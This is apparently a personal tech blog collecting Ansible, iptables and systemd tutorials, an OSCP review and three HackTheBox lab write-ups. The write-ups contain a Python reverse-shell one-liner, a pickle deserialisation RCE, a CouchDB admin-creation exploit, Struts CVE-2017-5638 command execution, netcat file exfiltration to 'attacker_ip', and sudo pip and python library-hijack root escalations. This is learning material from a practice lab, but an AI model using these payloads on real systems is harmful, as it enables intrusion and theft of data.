Introduction to Ansible Part 3

Hi there! Its been a long time since i posted continuation series on Ansible . if you have not read part one and two  it can be found here .

Now lets quickly define our objectives.

  1. Remotely manage ( Start/Stop ) the JBoss server with the help of a custom SystemD initialization script which is in turn called using Ansible remotely.
  2. Deploy a war file on JBoss application server which is placed at a remote machine.
  3. Undeploy a war file on JBoss server remotely.

As explained in our previous article, we can define static variables and defaults inside roles/webserver/defaults/main.yml file. So lets define our defaults variables. place these in the specified file(on ansible server machine) :

name : test

Username: DBuser

Password: DBPass

driver : <drivername>

connection_url : <connection_url>

pool_name: <pool_name>

JNDI_HOME: <jndi_home>

filter : “<user-name>{ { Username} }</user-name>”

deployname: warfile.war

deploy_path: /path/to/deployment/scanner/path

DeploySrcTemp: /remotepath/to/deployment

Now lets create a systemd service to control Jboss service. let us name it as   JbossControl.service with the following content.for tutorial on systemD refer my previous article :



Description= Jboss Application server control script

After =




ExecStop=/path/to/jboss/bin/ –connect command=:shutdown




save the file on remote machine and move it to roles/webserver/templates/ JbossControl.service.

Now we have required resources which are required for managing a Jboss app server remotely.

Now on our ansible server machine, we can update our roles/webserver/tasks/main.yml file with following content.


 – name: copy jboss service file to systemd folder


     src : “/path/to/ansible/roles/server/templates/JbossControl.service”

    dest: /etc/systemd/system/jbossControl.service

tags: [copyService]


 – name: start JBoss service


          state: started

          name: jbossControl

    tags: [StartJboss]


 – name: stop JBoss service


          state: stopped

          name: jbossControl

    tags: [StopJboss]


As we see in the tasks file, we have  used systemd module of ansible to invoke systemd services and targets . We have also utilized copy module to copy files from one location to another on remote system .now we can create a play.yml in the project root directory. with the following content:

 -hosts : RemoteMachines

  sudo : yes


   – webserver 

now we can invoke this playbook to start jboss/stop jboss on remote machine as follows :

to start Jboss application server on remote machines defined in RemoteMachines file :

> ansible-playbook play.yml –tags “copyService,StartJboss”

to stop Jboss application server on remote machines defined in RemoteMachines file :

> ansible-playbook play.yml –tags “StopJboss”

here , tags attribute while calling the playbook helps us to specify which services to run from the role. if we do not specify the tags, every task on the specified role runs and returns the result.

We have successfully completed the first objective of managing the remote JBoss application server! In the next tutorial we will see how to deploy and un deploy the war file remotely which also in turn involves managing data sources and config files. Stay Tuned !


OSCP Certification Review(Offensive Security Certified Professional)

Hi All! I just wanted to share my experience on my journey throughout OSCP.

what is OSCP?

OSCP is Offensive Security Certified Expert certification provided by Offensive security team. This certification can be achieved by taking mandatory PWK course provided by offsec and passing  24 hour fully hands on practical exam.



Why are you doing it ?!  when there are many reviews available already!??

I come from “different background” than most of the reviews i have seen. Just to add to long list of reviews available already 🙂

Lets get to the main part straight!

When Did you start and your previous job experience?

I Started my OSCP journey , in the month of june . I signed up for 60 days of lab time. I had nearly 1.5  years of  previous experience working on application automation and DevOps projects. I was always interested in the penetration testing field and voluntarily took up security testing of the projects i was working on along with my day to day job. I moved  to new team as full time web application pentester  exactly when my course started .

How did you do in your course and labs?

Coming to the course materials, we will get a pdf material and videos which helps us to gain different set of skills  and techniques, which can then be used on labs to pawn different machines which are separated by segments of four departments. we must pawn machines to get access to different networks and finally compromise all the machines in all four network.

My suggestion is to start working on  lab in parallel  with course pdf and videos. And make the most out of your lab.

there are extra points(5) given for documentation of exercises and lab machines, i never bothered to do it . but its really good thing to document as it helps us in our final reporting.

I was able to pawn around 35+ machines in my first month ,including all big four ( Pain, Sufference , Humble and Ghost) and get access to additional two networks…

When my lab time ended , i relied on solving machines on hackthebox particularly windows ones ( as it was my weakest point!) .

how did you do in your exam?

we need at least 70 out of 100 points to pass the exam. you will be given 24 hrs of time to crack the machines in the exam network. And additional 24 hrs to report your findings .

I gained the required points within first 12 hrs of my exam. Key thing is to enumerate the system properly without jumping directly after partial enumeration. Post exam, i used Official template given by offsec for my reporting.

I received the mail after a day , that i passed.

Some important supplements to the course materials?

Is Programming essential?

No . but basic knowledge on any scripting language  such as bash and python will surely help.

if you are just planning to take one, do not wait! just  enroll! its a wonderful experience altogether . Just make sure to do lot of self research on the topics when you are stuck in the labs.

Your final thoughts?

This is one of the best learning curve i ever had until now! because , this course forced me to learn many concepts otherwise i wouldnt touch or read. I was always a linux guy, it force me to learn windows environment and thanks to offsec, its really good to step out of our comfortzone! I thank offensive security team  for providing such awesome experience .

HackTheBox – Canape Fastrun WriteUp

Hi All, today we are going to solve canape machine from hackthebox..this walkthrough would be a fast run! as i am still in hangover of clearing OSCP ( :D) and a bit busy this i shall skip few commands and give you brief explanation how i solved this box.


So Lets start with nmap scan : nmap

80/tcp open http

we see only one port open…after a bit of enumeration from dirbusting the directories and other stuff, we find two interesting things :

  1. git repository is exposed :
  2. we see a submit quotes page which lets us to submit quotes.

and a comment in the source code of page. which specifies another interesting page :

from the git repository we download all the files recursively and clone it to a local repo.


root@kali:~/git# ls static templates


we find few interesting things in the python code.

first one being the poor input sanitization of “character” field . and the character and submitted quote is written directly to a file as the md5 of both.

as this line : p_id = md5(char + quote).hexdigest()



if request.method == “POST”:
char = request.form[“character”]
quote = request.form[“quote”]
if not char or not quote:
error = True
elif not any(c.lower() in char.lower() for c in WHITELIST):
error = True
# TODO – Pickle into dictionary instead, `check` is ready
p_id = md5(char + quote).hexdigest()
outfile = open(“/tmp/” + p_id + “.p”, “wb”)
outfile.write(char + quote)
success = True
except Exception as ex:
error = True

return render_template(“submit.html”, error=error, success=success)



and the next one being, in the check page code , we can see it is using pickle to deserialize the stored object from the file…From a recent vuln it was found that the way pickle handles data leads to RCE.

More on this vulnerability explained :

so our strategy is to create a payload inside character field and exploit the vuln by calling the check with our malicious md5 hashed file .(too lazy to share exploit 😀 write it yourself , this is fast run!  i shall share the git link :P)

character = reverse shell payload + “Homer”

once request is posted for quotes, we access the check page with our already known calculated md5 hash id named file. I used a python reverse shell payload from pentest monkey.


python -c “import os; import pty; import socket; lhost = ‘’; lport = 443; s = socket.socket(socket.AF_INET, socket.SOCK_STREAM); s.connect((lhost, lport)); os.dup2(s.fileno(), 0); os.dup2(s.fileno(), 1); os.dup2(s.fileno(), 2); os.putenv(‘HISTFILE’, ‘/dev/null’); pty.spawn(‘/bin/bash’); s.close();”

this is then used as shown in exploit , a class object under reduce function ,converted into pickle format using cpickle.dumps ( will find it in script) and post the request to quotes.

Then we post request to check with MD5 hashed filename.

We get a quick reverse shell ! 😀

root@kali:~# nc -nlvp 443
listening on [any] 443 …
connect to [] from (UNKNOWN) [] 58594

but we are still , a low priv www user who does not have access to the actual user flag .

so lets enum more :

from /etc/passwd :

we find a valid user :


now enumerating more we find that it is running couch db for its backend database . and also few interesting things from the /var/www folder.

we can confirm couch db is running :

www-data@canape:/var/www/git$ curl -s http://localhost:5984
curl -s http://localhost:5984
{“couchdb”:”Welcome”,”version”:”2.0.0″,”vendor”:{“name”:”The Apache Software Foundation”}}

this version is found to be vulnerable to admin user priv escalation .

now we can exploit it like this :

www-data@canape:/var/www/git$ python localhost -p 5984 -u menoe -P menoe
<t$ python localhost -p 5984 -u menoe -P menoe
[+] User to create: menoe
[+] Password: menoe
[+] Attacking host localhost on port 5984
[+] User menoe with password menoe successfully created.

Now lets use the user to fetch juicy database details..(* after a long lookup at couch db docs ! *) .after few mins of enumeration , it was found that password was stored in following view :

www-data@canape:/var/www/git$ curl -s http://menoe:menoe@localhost:5984/passwords/739c5ebdf3f7a001bebb8fc4380019e4

www-data@canape:/var/www/git$ su homer
Password: 0B4jyA0xtytZi7esBNGp

homer@canape:/var/www/git$ whoami

and now ! we can grab the user.txt flag! Now lets move onto privilege escalation .

now, from quick enumeration , we find that homer can execute few commands as root :

homer@canape:/var/www/git$ sudo -l

User homer may run the following commands on canape:
(root) /usr/bin/pip install *

A classic priv esc scenario ! wild card entry for pip install! lets create a temporary folder and add inside it .with priv esc  🙂 here we have created a folder called privesc, inside it we have added a file which contains following code to steal root flag.(we can replace any priv code to execute)

homer@canape:/tmp/privesc$ cat

import os
os.system(“cat /root/root.txt > /tmp/root.txt”)
os.system(“chmod 777 /tmp/root.txt”)


we can leverage pip -e option to install from a local built package. finally run this command to get root flag!

homer@canape:/tmp/privesc$ sudo /usr/bin/pip install -e /tmp/privesc/

command exits with no files/directories error, but our code should have been run already!lets verify :

homer@canape:/tmp$ ls -l /tmp/root.txt
rwxrwxrwx 1 root root 33 Sep 15 10:53 /tmp/root.txt

thats awesome! now lets quickly get our root flag 😀

homer@canape:/tmp$ cat /tmp/root.txt
<<root flag contents >>


thats all for this fast run! thank you. stay tuned for next writeup . have a nice day!

HackTheBox – Poison Writeup

Posion machine on hackthebox retired Today  anddd  I will explain, how I solved Poison box on HacktheBox. This box was one of the earlier machines attempted ..and its fairly easier one to crack.

Lets begin our enumeration  with Nmap scan.

nmap -sC -sV -T4

Nmap scan report for
Host is up (0.24s latency).
Not shown: 998 closed ports
22/tcp open ssh OpenSSH 7.2 (FreeBSD 20161230; protocol 2.0)
80/tcp open http Apache httpd 2.4.29 ((FreeBSD) PHP/5.6.32)
Service Info: OS: FreeBSD; CPE: cpe:/o:freebsd:freebsd

From Nmap scan, we have two ports (22 and 80) open. its feasible to start our enumeration with the web server port.

On navigating to,

we find an interesting portal which displays,

Temporary website to test local .php scripts.

Sites to be tested: ini.php, info.php, listfiles.php, phpinfo.php


so lets navigate to listfiles.php as it seems interesting.

we are greeted with the following content :

Array( [0] => . [1] => .. [2] => browse.php [3] => index.php [4] => info.php [5] => ini.php [6] => listfiles.php [7] => phpinfo.php [8] => pwdbackup.txt)

again, pwdbackup.txt looks interesting. Lets navigate to it:

displays :

This password is secure, it’s encoded atleast 13 times.. what could go wrong really..


As we see, encoding appears to be base64 . so after decoding the coded text 13 times.

final decoded value : Charix!2#4%6&8(0

so it appears to be credentials of some sort.  and also username appears to be charix.

Lets use these credentials to connect through SSH .

ssh charix@

charix@Poison:~ % whoami

Andd we are in!

grab the user flag and lets continue our enumeration!

charix@Poison:~ % ls user.txt

we find an interesting file named which is password protected. for some reason i was unable to unzip it on remote machine . so i copied the file to local using netcat :

on our local  machine : nc -nlvp 1234

on victim machine : nc -w 3 -nv attacker_ip 1234 <

unzip the file with command using the same password which was used for SSH  : unzip

and we get a file named secret as the content of the zip file . Also, we find that there is a vnc server running as root on victim machine.

charix@Poison:~ % ps -aux | grep root


root 529 0.0 0.7 23620 7148 v0- I Mon05 0:00.14 Xvnc :1 -deskto
root 540 0.0 0.3 67220 3288 v0- I Mon05 0:00.04 xterm -geometry


charix@Poison:~ %netstat -a


tcp4 0 0 localhost.5801 *.* LISTEN
tcp4 0 0 localhost.5901 *.* LISTEN


as it cannot be accessible from outside , we have to use local port forwarding to connect to it.

lets create a ssh tunnel to local port forward the vnc port.

on one of our terminal,

ssh -L 2345:localhost:5901 charix@

once connected minimize the terminal to leave the session open.

interpretation of this command is that,

we are instructing ssh to open and listen on port (2345) on our local machine , whichever request hits port 2345 on our machine will be forwarded to server machine(i.e poison machine) on port 5901 through SSH tunnel.

here, localhost should not be confused to our local machine, it implies localhost on server machine(i.e poison machine).

now on a new terminal, lets connect to the vncserver with the extracted secret file as password:

vncviewer -passwd secret

we get the VNC session of root user! grab the root.txt flag anndd keep pawning!

stay tuned for more write ups. Have a wonderful day ahead! 🙂



HackTheBox – Stratosphere Writeup

Hi All, Stratopshere machine  retired today on hackthebox Andddddddd YES! I will explain how I solved Stratosphere box on Hackthebox  . This was  a medium difficulty level box and one of the interesting box that has a nice privilege escalation technique.

check out hackthebox for upskilling your pentest game :

lets begin with basic nmap scan.


root@kali:~# nmap -sC -sV -T4

Starting Nmap 7.60 ( ) at 2018-08-31 21:57 IST
Nmap scan report for
Host is up (0.19s latency).
Not shown: 997 filtered ports
22/tcp open ssh OpenSSH 7.4p1 Debian 10+deb9u2 (protocol 2.0)
| ssh-hostkey:
| 2048 5b:16:37:d4:3c:18:04:15:c4:02:01:0d:db:07:ac:2d (RSA)
| 256 e3:77:7b:2c:23:b0:8d:df:38:35:6c:40:ab:f6:81:50 (ECDSA)
|_ 256 d7:6b:66:9c:19:fc:aa:66:6c:18:7a:cc:b5:87:0e:40 (EdDSA)
80/tcp open http

from nmap scan , we have three ports open , out of which, port 80 and 22 is notable. It is feasible to start our enumeration from the web  port 80 .

From the dirbuster bruteforce , we find out that there is hidden site hosted at

After a quick enumeration it is found out that , site is built using struts , and also vulnerable to Apache Struts CVE-2017-5638.

POC can be found here :

we can get the code execution by executing the POC file as follows.

python -u -c ‘cat /etc/passwd’


richard:x:1000:1000:Richard F Smith,,,:/home/richard:/bin/bash


from /etc/passwd file, we get the user named ‘richard‘ active on the machine

similarly it is found that it is running mysql with credentials ‘admin’/’admin’ from a file named db_connect . but since mysql is not exposed to the public, we have to rely on our previously found RCE to execute sql commands. this can be done as follows :

python -u -c ‘mysql -u admin -padmin users -e “show tables;”‘

from dumping tables , we find a table named ‘accounts‘ .

further dumping data from accounts table reveals certain credentials ,

python -u -c ‘mysql -u admin -padmin users -e “select * from accounts;”‘

fullName                       password                                                             username
Richard F. Smith   9tc*rhKuG5TyXvUJOrE^5CK7k     richard

These credentials can be used to connect through SSH on port 22. this gives us the user flag.

richard@stratosphere:~$ ls
Desktop           __pycache__          user.txt


by quick enumeration , it is found out richard can execute few commands as root:

richard@stratosphere:~$ sudo -l
Matching Defaults entries for richard on stratosphere:
env_reset, mail_badpass,

User richard may run the following commands on stratosphere:
(ALL) NOPASSWD: /usr/bin/python* /home/richard/

and also , quick analysis of source code from reveals, it is using hashlib library.

import hashlib


we can use a classic python priv esc library hijacking technique , where we can exploit how python looks for the imported libraries .

Since we have write permission to the working directory of the privileged python file. we can create a file named ‘’ with our custom code..  this makes python parser to look at our created file instead of the actual library file intended.

create a file named ‘’ in the same directory where ‘’ is present with following content to display contents of  root.txt file and spawn a root shell.(more on this priv esc technique:

import os
import pty
os.system(‘cat /root/root.txt’)

now lets execute the following command to gain ROOT!

richard@stratosphere:~$ sudo /usr/bin/python3 /home/richard/


Thank you. stay tuned for the next write up!




Introduction to Ansible : Part 2

In the previous post, we have described basic introduction of Ansible and its advantages . In this post lets build a skeleton of the project hierarchy we follow . I will explain what each of these structure does and how it would benefit us.

Now before we dive  into the structure, Ansible uses YAML syntax inside its file called playbook(playbook means simply a file with set of tasks bundled together)  . If you are not comfortable with YAML syntax or if you want to skim it through please refer Ansible documentation. They have the best explanation out there.

now lets create our first basic ansible playbook.

Create a file named test.yml inside project folder,And paste this content.

– hosts: remoteMachines
      – shell: echo “Hi!”

Save the file . Before running this append this line to the host under remoteMachines in the hosts file we created in the previous tutorial.

like this , ansible_user=sshuser1 ansible_user=sshuser2

This line specifies this user is used to SSH into the remote Host.(by default it takes the current user of the ansible server machine)


and to run the playbook we just created , use the following command :

> ansible-playbook  test.yml

this should return “Hi!” from both the remote machine output. And in the playbook we just created, hosts specifies the hosts we want to run the tasks on. It has a single task which uses the shell module to run echo “Hi!” command.

Now lets assume a scenario in which we have many common tasks to be run on multiple playbooks. To address such scenario , we will follow a specific structure and in order to reuse tasks spread across multiple playbooks, we will use a feature called “roles”.

Inside the project folder create a folder called as “roles”. Inside roles directory we will create another folder this folder is the name of role we want to use.(ex: webserver).

Inside webserver folder we will create these folders and files respectively. hierarchy as follows,
Roles > Webserver > defaults > main.yml

Roles > Webserver > tasks > main.yml

Roles > Webserver > handlers > main.yml

Roles > Webserver > templates 

Inside defaults folder ,we will find variables and default values in format of “name:value” pair inside main.yml file, these are extensively used in playbooks , templates and are placed to increase re usability.

Inside tasks folder , we will find set of tasks associated to the role inside main.yml file .

Inside handlers folder, we will find different handlers associated with the tasks. Handlers are similar to tasks . only difference is handlers are invoked only by another task.

Inside templates folder, we will find templates , which contains changing  values inside configuration files and these can be replaced by values inside defaults folder. They are processed by Jinja 2  template language.

Now in order to run this role, create a file named play.yml file inside project root folder. and place the following content and save

 – hosts: remoteMachines
– webserver

As we can see there is a granularity of different type of functionalities and reusability of tasks can be achieved by the concept of roles.

In the next tutorial , we will look at how to use this hierarchy to write a functional role and execute this playbook. Thank you!


Introduction to Ansible : Part 1

In one of my recent projects, I had this specific task , to automate Jboss Application server deployment. since it was running on a Ubuntu  machine , I thought of automating the whole process altogether . I had several Options , I chose Ansible as it satisfied all my requirements and less overhead Server administration .

In this article we will look at basics of Ansible and we will cover some more extensive features in later tutorials.

What is Ansible?

Ansible is an Infrastructure Automation Tool , widely used for automating day to day management of remote server tasks.

Why Ansible?

Management of multiple  Linux remote Hosts using SSH, in parallel.

Also supports Windows environment using powershell

Easy to use and works out of the box, no overhead of installing extra tools on slave machines . (relies on SSH for controlling)

Uses concept of states in which comparision of current state and the desired state of the task at hand is made, if the condition satisfies , task returns the existing state without running the task .

You can read more about Ansible  :

Main goal of this tutorial : have a centralized server with ansible installed to control remote(slave) machines to run or accomplish a specific task.

Lets Now setup ansible on Server machine.

How To install Ansible ?

You can install Ansible as a python pip package.

> pip install ansible

Once done, create a test project folder and inside it lets create an inventory file named “hosts” . This file is mainly used to define various groups of machine we would like to remotely manage.(use your favourite text editor and save this as content)

content of hosts file :



As we can see , there are two groups with labels myMachine and remoteMachines to administer different set of machines. myMachine would control my local machine ,whereas the remoteMachines would control other machines in the network.

Note : As a prerequisite the server machine should be configured to auto SSH  to slave machines. ( to avoid specifying parameters on runtime)

now lets run a simple task against myMachine (that is localhost)

> ansible -i hosts   myMachine –connection=local  -m ping


here we can see , -i parameter specifies the inventory file name , in this case its “hosts” . myMachine specifies the group label of the machines for which task has to run. here machines under that label will run the task. “–connection=local” which specifies run the command on localhost (not to use SSH). -m arg specifies the module to be used. Here we are using Ping module.(we will see more in upcoming tutorials)

typical response should be, | success >> {
“changed”: false,
“ping”: “pong”

If you have successfully completed this , congratulations! you have run your first ansible task. In upcoming tutorials, we will look at more granular ways of running tasks using concept of roles.


Introduction to iptables and configure linux firewall rules

In this article , We will see the introduction to iptables and how to write basic packet filtering  rules along with the the glimpse at  how iptables interact with  netfilter hooks to carry out its functionality.

Iptables is a linux firewall administrative utility which helps in packet filtering and NAT ( Network Address Translation ) .

Iptables acts as an interface for an user to carry out the filtering ,mangling of packets and NAT functionality. operation mainly relies on netfilter hooks. ‘netfilter’ is mainly a series of hooks at various layers of kernal network protocol stack . whenever a packet arrives(or leaves)  the interface , loaded kernal modules can register at these hooks  and  triggered accordingly based on the priority provided.

there are totally five hooks that a program can register with,to manipulate or verify the packet.

  1. NF_PRE_ROUTING : packet has just entered the network stack. will be triggered first , decision about the destination is made.
  2. NF_IP_FORWARD :  This hook is triggered only when decision about the destination is not the local system but to forward to other.
  3. NF_IP_LOCAL_IN :  This hook is triggered when the local system is the destination.
  4. NP_IP_LOCAL_OUT : This hook is triggered when the packet is originated from  local system and is about to leave the network interface.
  5. NF_POST_ROUTING : This hook is triggered post NF_IP_FORWARD hook just before it leaves the network interface.

Note : each packet entering or leaving the network interface  is stored as an instance of sk_buff structure. And the hooks are applied on sk_buff structure for packet filtering.

iptables consists of tables defined based on the functionality of the same.these tables consists of series of chains and in turn these chains consists of rules to be matched.

Different tables:

  1. Filter (default)
  2. NAT
  3. Mangle
  4. Raw
  5. security

Different chains :


As said earlier , these  chains of multiple table are triggered at five hooks with the priority defined and sequentially evaluated.

now lets focus on defining rules for Filter table. This table has mainly three chains namely INPUT , OUTPUT , FILTER.

each of these chains can have different rules in which will be applied to the packets in question.if none of the rules apply to the packet , the Default policy is triggered.You can set the default policy of each chain as follows,

iptables -t filter -P INPUT DROP

iptables -t filter -P OUTPUT ACCEPT

iptables -t filter -P FORWARD REJECT


> first rule specifies a default policy ( – p) for input chain as drop the packet by default  if it does not match any rules in the chain.

> second rule specifies a default policy for output chain as accept the packet by default if it does not match any rules in the chain.

> third rule specifies a default policy for forward chain as reject( send an error response) the packet by default if it does not match any rules in the chain.

Now we can append the custom rules to each of the chain.

ex 1 : iptables -t filter -A INPUT -p tcp -s –dport 80 -j ACCEPT

here, this rule specifies that for filter table(-t) ,  append (-A) a rule to INPUT chain  for protocol (-p) tcp and source of packet(-s) from to the destination port (–dport) 80 and ACCEPT the packet (-j).

ex 2 : iptables -t filter -A OUTPUT -p tcp -d –sport 80 -j DROP

here, this rule specifies that for filter table(-t) , append (-A) a rule to OUTPUT chain for protocol (-p) tcp and destination of the packet ( -d) to from the source port(–sport) 80 and DROP the packet(-j).

we can view the list of rules for each of the table using,

 iptables -t [table name] -L

we can make use of conntrack to track the state of each tcp/udp connection.

ex : iptables -A INPUT -p tcp –dport 80 -s -m conntrack –cstate NEW -j ACCEPT

here, we are using conntack module  to accept the packet only if the state is new. ( first packet of the new connection.)

furthermore,  this feature  helps in deciding which packet belongs to which session/connection.

only con with this is, with increase in magnitude of traffic , cost of maintaining state will be very high.

we can also enable logging and use it on a specific rule as shown below :

iptables -A INPUT -s -j LOG –log-level 4 –log-prefix “/Admin”

This would effectively enable logging for the input connections matching the rule in the chain.


for detailed information regarding netfilter architecture :   visit

Introduction to Initialization systems and creating your first Systemd service

In this post, We will see what is an initialization system and finally we will create a service for one of the popular and modern initialization system ‘Systemd’.

What is an Initialization system?

Init System daemons are the first process spawned by the kernal process when a server boots, which carries major initialization and management of services that are crucial to certain context operations . And also managing services across different runlevels . for example, spawning a getty login shell on startup. There can be custom services too, such as starting ‘ssh’ service on startup.

 Note : Initialization system has process ID = 1  and parent process ID = 0 .

There are many initialization systems available . Few of the popular ones are SysvInit , upstart and systemd.

SysvInit is one of the easy and simplest init system which mainly handles static events such as load all the service once the system boots . This effectively lacks handling dynamic events such as handling Pluggable USB’s , hotplugs , external SSD.  SysvInit initialization system manages different services required based on the default runlevel specified. (default runlevel is runlevel 5 i.e, graphical mode). the services inside the folder /etc/rc.d/rcx.d where x=0,1,2,3,4,5,6  specifies which service scripts has to be run for a particular runlevel on startup .

Note : You can change runlevel of a system using ‘init runlevel’  .

example : ‘init 0’  would effectively halts or shut down the system.

Upstart is another initialization system which was designed to handle dynamic events instead of pre defined sequence of activating services. they use the concept of jobs which effectively initializes and monitors services .

Systemd init system daemons are the recent replacements for other initialization daemons which is complex of them all. Specialty  of this system is that it can start services in parallel. Out of all Systemd manages ‘Units’ .

There are totally 8 type of unit files, out of all we focus mainly on two that is service unit files and target unit files.

service unit files are used to manage different services. And target unit files are a collection of services , which would collectively form run level of a system.

System specific service files reside under ‘/lib/systemd/system’ directory , whereas Custom user service files reside under ‘/etc/systemd/system’ directory.

Main service/target handling commands :

Start a service / target file :  systemctl start unitname.service
or systemctl start

ex : systemctl start apache2.service

Stop a service / target file :  systemctl stop unitname.service
or systemctl stop

ex :  systemctl stop apache2.service

Status of a service / target file :  systemctl status unitfile.service

ex : systemctl status apache2.service

restart a service unit file :  systemctl restart unitfile.service

ex : systemctl restart apache2.service

enable service on start – up : systemctl enable unitfile.service

ex : systemctl enable ssh.service

disable service on start – up :systemctl disable unitfile.service

ex : systemctl disable ssh.service

Note : .service extension can be omitted and is considered by default.

Now Lets create a custom service unit file and see the required procedure to enable one.

  1. Create a file with extension .service , with the following content.

Description=Trial service

ExecStart=/bin/sh -c “runtime”
ExecStop=/bin/sh -c “uname -a”



Above content creates a unit with required unit description , and the attributes of service such as ‘Type ‘ which specifies if the  service is oneshot ,forking , simple, notify or idle . here we have used oneshot which means that it executes some action and exits immediately .This requires another attribute ‘RemainAfterExit’ to be set. ‘ExecStart’ is the attribute which has a process to be executed once this unit is started. ‘ExecStop’ is the attribute which has a process to be executed once this unit is stopped. and finally WantedBy attribute specifies the target file which requires this service for it to initialize.

2. Move the myservice.service unit file to /etc/systemd/system directory . and finally start the service file .

systemctl myservice.service start

Following snaps captures the status of the service once initialized and then stopped.

img (a) : status after starting  the  service, we can see in the systemctl logs from journal logs that the command defined in the ExecStart attribute executed successfully and the output is displayed in the logs.


img (b) : status after stopping the  service, we can see in the systemctl logs from journal logs that the command defined in the ExecStop attribute executed successfully and the output is displayed in the logs.

We have successfully created a simple service file and initialized it , now if we want to enable it to start at boot , we can use enable command as described above. this effectively creates a symbolic link to directory with the same service name .

Note : we can also make use other attributes such as ExecStartPre , ExecStopPre etc.

Detailed documentation can be found at  systemd official website :